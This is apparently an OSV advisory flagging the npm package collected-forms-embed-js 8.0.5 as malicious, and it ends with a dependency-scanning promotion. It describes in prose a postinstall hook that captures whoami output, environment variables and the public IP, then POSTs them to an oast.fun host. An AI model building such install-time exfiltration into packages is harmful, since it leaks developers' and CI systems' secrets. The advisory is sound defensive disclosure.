collected-forms-embed-js @8.0.5
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-4175
Ecosystem
npm
Summary
The package.json declares a postinstall lifecycle hook that performs reconnaissance and exfiltration on every install. The script invokes child_process to capture host identity (whoami) and reads process.env, queries https://api.ipify.org to obtain the installer's public IP, and POSTs the collected data to a subdomain under.oast.fun (an out-of-band application security testing / interaction host commonly used as exfiltration C2). Any developer or CI system running npm install for this package will leak host identity, environment variables, and network identifiers to the attacker-controlled callback. There is no legitimate reason for a forms-embedding library to fingerprint hosts and beacon to an OAST domain at install time.
Source: amazon-inspector (b110466fd12f426709ec7f628f63304d175faddb8094d08e8448388ed3114805)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.